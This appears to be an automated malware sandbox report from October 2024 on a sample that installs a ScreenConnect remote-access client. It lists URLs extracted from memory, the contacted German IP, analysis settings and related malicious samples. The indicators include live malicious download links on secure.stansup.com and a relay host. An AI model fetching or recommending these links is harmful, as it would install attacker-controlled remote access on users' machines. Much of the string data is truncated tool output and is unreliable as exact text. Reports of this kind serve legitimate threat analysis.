                                                                                      https://secure.stansup.com/Bin/ScreenConnect.Client.applicationdfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2239737047.0000021CEA8E0000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD051A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1754297358.000000000328F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752587348.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1754297358.0000000003281000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752587348.000000000163C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://secure.stansup.com/Bin/ScreenConnect.Client.applicationXScreenConnect.WindowsClient.exe, 0000000A.00000002.1754297358.000000000328F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedfsvc.exe, 00000001.00000002.2221493797.0000021CD023A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.1810637519.0000000001CB5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80601roofManagesvchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://Passport.NET/tb_svchost.exe, 00000008.00000003.1455371851.000001E11BE3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://login.livesvchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://secure.stansup.com/Bin/ScreenConnect.ClientService.exeodfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsuersvchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://secure.stansup.com/Bin/ScreenConnect.CliScreenConnect.WindowsClient.exe, 0000000A.00000002.1752587348.000000000156D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://ns.adobe.cdfsvc.exe, 00000001.00000002.2239079967.0000021CE8ECB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.adfsvc.exe, 00000001.00000002.2221493797.0000021CD051A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://account.live.com/msangcwamsvchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384073807.000001E11B957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://login.microsoftonline.com/MSARSsvchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://secure.stansup.com/Bin/ScreenConnect.Client.applicationpdfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  http://www.w3.ordfsvc.exe, 00000001.00000002.2221493797.0000021CD081A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD051A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD083D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD08A4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752587348.0000000001622000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://secure.stansup.com/Bin/ScreenConnect.Client.applicationtmdfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://crl.ver)svchost.exe, 00000007.00000002.2607269224.000002074AC00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605859392.000001E11B0D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxsvchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        http://passport.net/tbsvchost.exe, 00000008.00000003.1455371851.000001E11BE3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B0F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://secure.staPdfsvc.exe, 00000001.00000002.2221493797.0000021CD0924000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://account.live.com/Wizard/Password/Change?id=80601Authsvchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfsvchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd04/01svchost.exe, 00000008.00000003.1417148795.000001E11B952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80605teAccountCsvchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdssvchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://secure.stansup.com/Bin/ScreenConnect.Windodfsvc.exe, 00000001.00000002.2221493797.0000021CD0924000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://secure.stansup.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.or3Q2U6NXT.log.1.drfalse
                                                                                                                                          		unknown
                                                                                                                                          https://g.live.com/odclientsettings/Prod-C:edb.log.7.drfalse
                                                                                                                                            		unknown
                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000008.00000002.2606537340.000001E11BE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://secure.stansup.com/Bin/ScreenConnect.Windows.dllLdfsvc.exe, 00000001.00000002.2239737047.0000021CEA8E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdessvchost.exe, 00000008.00000002.2606300505.000001E11B95F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://login.microsoftonline.com/MSARSEntesvchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSIDsvchost.exe, 00000008.00000003.1383787727.000001E11B910000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383787727.000001E11B910000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/09/policysrfsvchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000008.00000002.2606257745.000001E11B937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B95F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1416236491.000001E11B955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://Passport.NET/STSsvchost.exe, 00000008.00000002.2606300505.000001E11B977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.configHWdfsvc.exe, 00000001.00000002.2240921151.0000021CEA9A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                http://docs.oasis-open.org/wss/2svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 00000001.00000002.2221493797.0000021CD02B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&id=80603rfsvchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://secure.stansup.com/Bin/ScreenConnect.Client.applicatQjq85KfhBC.exe, 00000000.00000002.1445501228.000000000109C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.configrW6zdfsvc.exe, 00000001.00000002.2240921151.0000021CEA9A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://www.w3.odfsvc.exe, 00000001.00000002.2221493797.0000021CD081A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://Passport.NET/tbsvchost.exe, 00000008.00000003.1433983414.000001E11B959000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606505484.000001E11BE36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1417812360.000001E11B930000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1449639366.000001E11B077000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1417812360.000001E11B929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605566534.000001E11B07A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 00000008.00000002.2606300505.000001E11B95F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606146070.000001E11B902000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1449163032.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1417148795.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1416236491.000001E11B955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlepksvchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://signup.live.com/signup.aspxsvchost.exe, 00000008.00000003.1383839850.000001E11B955000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B92C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000008.00000003.1455330524.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605934744.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B102000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe:Udfsvc.exe, 00000001.00000002.2240921151.0000021CEA9A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 00000008.00000003.1449293708.000001E11B92B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606257745.000001E11B937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1433346941.000001E11B92B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B95F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1416236491.000001E11B955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 00000008.00000002.2606257745.000001E11B937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://ocsp.digiQjq85KfhBC.exe, 00000000.00000002.1445501228.000000000109C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://www.xrml.org/schema/2001/11/xrml2coredfsvc.exe, 00000001.00000002.2221493797.0000021CD02B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 00000008.00000003.1455330524.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605934744.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B102000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://secure.stansup.com/Bin/ScreenConnect.WindowsCldfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383787727.000001E11B910000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        http://upx.sf.netAmcache.hve.6.drfalse
                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        https://secure.stansup.com/Bin/ScreenConnect.Client.application89Gdfsvc.exe, 00000001.00000002.2239737047.0000021CEA8E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/Micdfsvc.exe, 00000001.00000002.2239079967.0000021CE8ECB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf(svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		unknown

                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                              79.110.49.185
                                                                                                                                                                                                              		secure.stansup.comGermany
                                                                                                                                                                                                              		57287OTAVANET-ASCZfalse

                                                                                                                                                                                                              Private

                                                                                                                                                                                                              IP
                                                                                                                                                                                                              127.0.0.1

                                                                                                                                                                                                              General Information

                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                              Analysis ID:1542315
                                                                                                                                                                                                              Start date and time:2024-10-25 19:26:10 +02:00
                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                              Overall analysis duration:0h 8m 23s
                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                              Number of analysed new started processes analysed:17
                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                              Sample name:Qjq85KfhBC.exe
                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                              Original Sample Name:a43cca6cc162e4b68f0844d507f5300216e6ced88af03fabedc1d053d743064d(1).exe
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal60.evad.winEXE@18/77@2/2
                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                              • Successful, ratio: 83.3%
                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                              • Successful, ratio: 73%
                                                                                                                                                                                                              • Number of executed functions: 285
                                                                                                                                                                                                              • Number of non-executed functions: 28
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 40.126.32.133, 20.190.160.14, 40.126.32.76, 40.126.32.136, 20.190.160.20, 40.126.32.140, 20.190.160.22, 40.126.32.138, 217.20.57.21, 192.229.221.95, 184.28.90.27, 13.89.179.12, 93.184.221.240
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, wu.ec.azureedge.net, cacerts.digicert.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                                              • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 2788 because it is empty
                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                              • VT rate limit hit for: Qjq85KfhBC.exe

                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                              13:27:13API Interceptor147009x Sleep call for process: dfsvc.exe modified
                                                                                                                                                                                                              13:27:13API Interceptor1x Sleep call for process: Qjq85KfhBC.exe modified
                                                                                                                                                                                                              13:27:15API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                              13:27:22API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                              IPs

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              79.110.49.185xrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                EPCo9k8NIn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                  X5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                    AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                      z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                        wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                          3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                            z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse

                                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  secure.stansup.comX5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
